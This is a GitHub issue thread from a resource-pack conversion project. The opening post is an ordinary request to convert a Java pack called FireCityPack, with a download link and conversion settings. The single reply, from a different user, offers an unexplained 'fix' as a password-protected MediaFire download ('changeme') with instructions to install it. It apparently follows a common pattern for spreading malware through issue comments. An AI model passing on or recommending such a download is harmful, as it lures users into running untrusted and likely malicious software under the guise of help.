### ISSUE TITLE
[Pack]: FireCityPack

### ISSUE THREAD

**Issue by Sevitv** [Kas-tle/java2bedrock.sh#33433]
### Java Pack Direct Download URL

https://www.dropbox.com/scl/fi/tyxmi1bot37h5mqmucugg/FireCityPack.zip?rlkey=t2mkb9hczvjls7jxbu0p6h5mm&st=89wbmjvx&dl=0

### Default Assets Version

1.20.1

### Block Material

None

### Attachable Material

entity_emissive_alpha_one_sided

### Archive Scratch Files

false

### Rename Model Files

true

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
